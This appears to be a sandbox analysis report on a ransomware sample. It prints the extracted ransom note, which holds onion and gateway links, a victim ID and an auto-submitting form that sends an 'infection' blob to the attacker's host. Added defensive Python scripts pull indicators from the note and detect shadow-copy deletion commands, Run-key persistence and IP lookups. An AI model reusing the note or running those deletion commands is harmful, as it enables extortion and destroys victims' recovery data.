General

  • Target

    RNSM00312.7z

  • Size

    2.2MB

  • Sample

    241112-yp2vvaypbv

  • MD5

    81948ac7307816c1e33385c3f7d8fa53

  • SHA1

    6e1b6fa3ee72926a6c8213e5ab1f6f4d89aeedaf

  • SHA256

    4f5e0c01a276680e6d960984692c3e1cc5b4a36955db0322dedd93f3d1e3a546

  • SHA512

    497a63704be54cae6fd6b2766fa25f0af5b53c1cd5f38133b1e688022e97eb80544163477a4fe5a1867700d6132cd0c4d40f4a524ede091e52cced40ba41036b

  • SSDEEP

    49152:L1kNO/v4ThoYQ4AR2cJpGrge/aH8psuKYCC:yEqoYiwaQfh

Malware Config

Extracted

  • Path

    C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\[HOW_TO_DECRYPT_FILES].html

  • Ransom Note

<html>
<head>
<title>How can I recover my files ?</title>
<style>
html, body { font-family: lucida sans,tahoma,aerial,serif; font-size: 14px; overflow-x: hidden; background-color: #fff; padding-left: 1rem; }
div.box { border: 1px dotted #212121; padding: 0.4rem; display: block; margin-top: 0.5rem; margin-bottom: 0.5rem; }
input[type=submit] { border: none; padding: 0.1rem 0.7rem 0.1rem 0.7rem; background-color: #303f9f; color: #fff; }
input[type=submit]:hover { background-color: #212121; }
a { color: #212121; text-decoration: none; font-weight: bold; }
a:hover { color: #3f51b5; text-decoration: underline; }
</style>
</head>
<body onload="submit_form()">
<div style="margin: auto; max-width: 750px; padding: .5rem 1.5rem .5rem 1.5rem;">
<h3>What happened to my files ?</h3>
<p> All of your important files were encrypted using a combination of <a rel="noreferrer" href="https://en.wikipedia.org/wiki/Public-key_cryptography">RSA-2048</a> and <a rel="noreferrer" href="https://en.wikipedia.org/wiki/Advanced_Encryption_Standard">AES-256</a>. </p>
<h3>What does this mean ?</h3>
<p> This means that your files were modified in a way that makes working with them impossible, unless you have the keys to decrypt them. </p>
<h3>Is it possible to recover my files ?</h3>
<p> Yes, it possible to get your files back, you'll need a special program (decryptor) and the private key of the key pair used to encrypt them. </p>
<h3>How can I get the decryptor and the private key ?</h3>
<p> First, you'll need to synchronize your machine with our site, you can do this by clicking the button "Upload the KEY file". You can also manually upload the synchronization file <span style="border: 1px dotted #212121;padding: 0.1rem 0.3rem 0.1rem 0.3rem;">C:\Users\Public\Desktop\KEY</span> by visiting any of the links below. <span style="display: block; font-size: 0.8rem;">*This file contains information to identify your machine and the keys used to encrypt your files. However, those keys are encrypted and only our server can decrypt them.</span> </p>
<p> After you've synchronized your machine with our server, you'll just need to follow the instructions there on how to pay for the decryption of your files. </p>
<div style="text-align: center;padding-top: 0.5rem; padding-bottom: 0.5rem;">
<form id="infection_form" action="http://lockerrwhuaf2jjx.onion.sx" method="POST">
<input type="hidden" name="infection" value="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">
<noscript><span style="color: red; font-weight: bold;">Javascript is disabled! You must click the button below or manually upload the KEY file.</span></noscript>
<input type="submit" value="Upload the KEY file">
</form>
</div>
<div class="box">
<p> Instructions to install Tor Browser (recommended). </p>
<hr>
<ol>
<li>Download the Tor Browser Bundle here: <a rel="noreferrer" href="https://www.torproject.org/download/download-easy.html.en#windows">https://www.torproject.org</a>.</li>
<li>Execute the file you downloaded to extract the Tor Browser into a folder on your computer.</li>
<li>Then simply open the folder and click on "Start Tor Browser".</li>
<li>Copy and paste the onion address into the address bar:<br><br><span style="border: 1px dotted #212121;padding: 0.15rem 0.3rem 0.15rem 0.3rem;">http://lockerrwhuaf2jjx.onion/BCXRJFKE_6A57DF960BC14B256522DF69/</span></li>
</ol>
</div>
<div class="box">
<p style="text-align: center; color: red;"> Although it is not recommended to use web proxies to access the website, you can use the links below with a normal browser to access your page. Just remember to use the Tor Browser whenever making a payment. WARNING: The links below do not belong to us, they all go through someone else's server and should be avoided whenever possible. </p>
<ol>
<li><a rel="noreferrer" href="http://lockerrwhuaf2jjx.onion.sx/BCXRJFKE_6A57DF960BC14B256522DF69/">http://lockerrwhuaf2jjx.onion.sx/BCXRJFKE_6A57DF960BC14B256522DF69/</a></li>
<li><a rel="noreferrer" href="http://lockerrwhuaf2jjx.onion.link/BCXRJFKE_6A57DF960BC14B256522DF69/">http://lockerrwhuaf2jjx.onion.link/BCXRJFKE_6A57DF960BC14B256522DF69/</a></li>
<li><a rel="noreferrer" href="https://lockerrwhuaf2jjx.onion.rip/BCXRJFKE_6A57DF960BC14B256522DF69/">https://lockerrwhuaf2jjx.onion.rip/BCXRJFKE_6A57DF960BC14B256522DF69/</a></li>
<li><a rel="noreferrer" href="https://lockerrwhuaf2jjx.onion.to/BCXRJFKE_6A57DF960BC14B256522DF69/">https://lockerrwhuaf2jjx.onion.to/BCXRJFKE_6A57DF960BC14B256522DF69/</a></li>
</ol>
</div>
</div>
</body>
<script>
function submit_form() { if (confirm('Do you want the KEY file to be automatically uploaded ?')) { document.infection_form.submit(); } }
</script>
</html>
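The note above is itself a source of indicators: it names one onion service, four clearnet Tor2Web-style gateways for it (reachable without Tor, so they show up in ordinary DNS and proxy logs), a victim-specific path segment, and a form that the body's onload handler submits automatically. The following Python script is an added example for pulling those out of a note; it is not part of the sandbox report or of the malware. The HTML it runs on is a constructed, abbreviated copy of the note with the hidden "infection" blob replaced by a placeholder, and the victim-ID pattern is an assumption based on the one path seen here.

```python
"""Pull the network IOCs and victim identifier out of a ransom note like the
one extracted above (added example; not part of the sandbox report)."""
import re
from urllib.parse import urlparse

# Constructed, abbreviated copy of the extracted note: only the elements the
# extractor needs, with the hidden "infection" blob replaced by a placeholder.
NOTE = """<body onload="submit_form()">
<form id="infection_form" action="http://lockerrwhuaf2jjx.onion.sx" method="POST">
<input type="hidden" name="infection" value="PLACEHOLDER">
<input type="submit" value="Upload the KEY file">
</form>
<span>http://lockerrwhuaf2jjx.onion/BCXRJFKE_6A57DF960BC14B256522DF69/</span>
<a href="http://lockerrwhuaf2jjx.onion.sx/BCXRJFKE_6A57DF960BC14B256522DF69/">1</a>
<a href="http://lockerrwhuaf2jjx.onion.link/BCXRJFKE_6A57DF960BC14B256522DF69/">2</a>
<a href="https://lockerrwhuaf2jjx.onion.rip/BCXRJFKE_6A57DF960BC14B256522DF69/">3</a>
<a href="https://lockerrwhuaf2jjx.onion.to/BCXRJFKE_6A57DF960BC14B256522DF69/">4</a>
<a rel="noreferrer" href="https://www.torproject.org/download/download-easy.html.en#windows">Tor</a>
<script>function submit_form() { if (confirm('Upload?')) { document.infection_form.submit(); } }</script>
</body>"""

URL_RE = re.compile(r"https?://[^\s\"'<>]+")
# A v2 (16 char) or v3 (56 char) onion name, optionally followed by a Tor2Web
# gateway suffix such as .sx, .link, .rip or .to.
ONION_RE = re.compile(r"^([a-z2-7]{16}|[a-z2-7]{56})\.onion(\.[a-z]+)?$")
# Victim-specific path segment of the form <letters/digits>_<hex> (assumption
# generalised from the single ID in this note).
VICTIM_RE = re.compile(r"/([A-Z0-9]+_[0-9A-F]+)/")


def extract_iocs(html):
    """Classify every URL in the note into onion services, clearnet Tor2Web
    gateways (reachable without Tor, so visible in ordinary proxy/DNS logs),
    victim identifiers and other hosts."""
    iocs = {"onion_services": set(), "tor2web_gateways": set(),
            "victim_ids": set(), "other_hosts": set()}
    for url in set(URL_RE.findall(html)):
        parsed = urlparse(url)
        host = (parsed.hostname or "").lower()
        m = ONION_RE.match(host)
        if not m:
            iocs["other_hosts"].add(host)
            continue
        iocs["onion_services"].add(m.group(1) + ".onion")
        if m.group(2):
            iocs["tor2web_gateways"].add(host)
        v = VICTIM_RE.search(parsed.path)
        if v:
            iocs["victim_ids"].add(v.group(1))
    return iocs


def auto_submit_target(html):
    """If the note submits a form as soon as it is opened (body onload), return
    (form action, name of the hidden field it posts); otherwise None."""
    if not re.search(r'<body[^>]*\bonload="submit_form\(\)"', html):
        return None
    form = re.search(r'<form[^>]*\baction="([^"]+)"[^>]*>(.*?)</form>', html, re.S)
    if not form:
        return None
    hidden = re.search(r'<input[^>]*type="hidden"[^>]*\bname="([^"]+)"', form.group(2))
    return form.group(1), (hidden.group(1) if hidden else None)


if __name__ == "__main__":
    for kind, values in extract_iocs(NOTE).items():
        print(kind, sorted(values))
    print("auto-submit:", auto_submit_target(NOTE))
```

The gateway hostnames are the ones worth blocking or hunting for first: a victim who opens the note in a browser with JavaScript enabled and clicks through the confirm dialog will POST the "infection" blob to the .onion.sx gateway over plain HTTP, which is observable at the proxy even though the operator's real service sits behind Tor.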

Targets

    • Target

      RNSM00312.7z

    • Deletes shadow copies

      Ransomware commonly deletes Volume Shadow Copies and other recovery data to inhibit system recovery.

    • Contacts a large (773) number of remote hosts

      This may indicate a network scan to discover remotely running services.

    • Checks computer location settings

      Looks up the country code configured in the registry, likely a geofence check.

    • Executes dropped EXE

    • Loads dropped DLL

    • Adds Run key to start application

      Writes an autostart entry under a Run registry key so the payload is launched again at logon.

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Suspicious use of SetThreadContext

      Rewriting the context of another thread is a common step in process injection and process hollowing.

    • UPX packed file

      Detects executables packed with UPX or a modified UPX open-source packer.
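Several of the signatures above correspond to host telemetry that a SOC already collects: process command lines, registry writes and reads, DNS queries and outbound connections. The following Python script is an added example, not the sandbox's own rule logic, showing how those behaviours can be expressed as detections and run over a batch of events. The event schema, the threshold for "large" host fan-out and the list of IP-lookup services are assumptions for the example, and the events it runs on are constructed to mix a few benign actions with the behaviours reported above.

```python
"""Behaviour-based detections matching the sandbox signatures above
(added example; not the sandbox's own rule logic)."""
import re
from collections import defaultdict

# Command lines that destroy Volume Shadow Copies or recovery data.
SHADOW_DELETE = [
    re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows", re.I),
    re.compile(r"\bwmic(\.exe)?\s+shadowcopy\s+delete", re.I),
    re.compile(r"\bwbadmin(\.exe)?\s+delete\s+catalog", re.I),
    re.compile(r"\bbcdedit(\.exe)?\b.*\brecoveryenabled\s+no", re.I),
]
# Autostart registry locations written for persistence.
RUN_KEY = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.I)
# Registry location holding the configured country (GeoID), read by geofencing code.
GEO_KEY = re.compile(r"\\Control Panel\\International\\Geo\\", re.I)
# Illustrative set of external-IP lookup services (assumption; extend as needed).
IP_LOOKUP_HOSTS = {"api.ipify.org", "icanhazip.com", "checkip.dyndns.org", "ifconfig.me"}
# Distinct remote hosts one process may contact before we call it a scan (assumption).
FANOUT_THRESHOLD = 100


def detect(events):
    """Return (signature, pid, evidence) tuples for a list of event dicts.

    Event schema is an assumption for this example, loosely modelled on Sysmon:
      {"type": "process",  "pid": int, "cmdline": str}
      {"type": "registry", "pid": int, "op": "set" | "query", "key": str}
      {"type": "dns",      "pid": int, "query": str}
      {"type": "network",  "pid": int, "dst": str}
    """
    findings = []
    dst_by_pid = defaultdict(set)
    for ev in events:
        kind, pid = ev["type"], ev["pid"]
        if kind == "process":
            if any(p.search(ev["cmdline"]) for p in SHADOW_DELETE):
                findings.append(("deletes_shadow_copies", pid, ev["cmdline"]))
        elif kind == "registry":
            if ev["op"] == "set" and RUN_KEY.search(ev["key"]):
                findings.append(("adds_run_key", pid, ev["key"]))
            elif ev["op"] == "query" and GEO_KEY.search(ev["key"]):
                findings.append(("checks_location_settings", pid, ev["key"]))
        elif kind == "dns" and ev["query"].lower() in IP_LOOKUP_HOSTS:
            findings.append(("external_ip_lookup", pid, ev["query"]))
        elif kind == "network":
            dst_by_pid[pid].add(ev["dst"])
    # Fan-out is evaluated once all events are seen, per source process.
    for pid, dsts in sorted(dst_by_pid.items()):
        if len(dsts) >= FANOUT_THRESHOLD:
            findings.append(("large_host_fanout", pid, f"{len(dsts)} distinct hosts"))
    return findings


def build_sample_events():
    """Constructed events: a few benign ones mixed with the behaviours reported above."""
    events = [
        {"type": "process", "pid": 4242, "cmdline": "vssadmin.exe List Shadows"},  # benign
        {"type": "process", "pid": 4242, "cmdline": "vssadmin.exe Delete Shadows /All /Quiet"},
        {"type": "process", "pid": 4242, "cmdline": "wmic shadowcopy delete"},
        {"type": "registry", "pid": 4242, "op": "query",
         "key": r"HKCU\Control Panel\International\Geo\Nation"},
        {"type": "registry", "pid": 4242, "op": "set",
         "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\svchost"},
        {"type": "registry", "pid": 1000, "op": "set",
         "key": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\App"},  # benign
        {"type": "dns", "pid": 4242, "query": "api.ipify.org"},
        {"type": "dns", "pid": 1000, "query": "example.com"},  # benign
    ]
    # Scanner-like fan-out from the suspect process; a handful of hosts from a benign one.
    events += [{"type": "network", "pid": 4242, "dst": f"10.0.{i // 256}.{i % 256}"}
               for i in range(120)]
    events += [{"type": "network", "pid": 1000, "dst": f"192.168.1.{i}"} for i in range(5)]
    return events


if __name__ == "__main__":
    for sig, pid, evidence in detect(build_sample_events()):
        print(f"{sig:26} pid={pid:<5} {evidence}")
```

Each rule on its own is noisy (administrators do run vssadmin, and plenty of software writes Run keys); the value is in correlating several of them on one process within a short window, which is exactly the combination the sandbox reports for this sample. The fan-out rule is the one to tune most carefully, since legitimate discovery and update agents also talk to many hosts.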
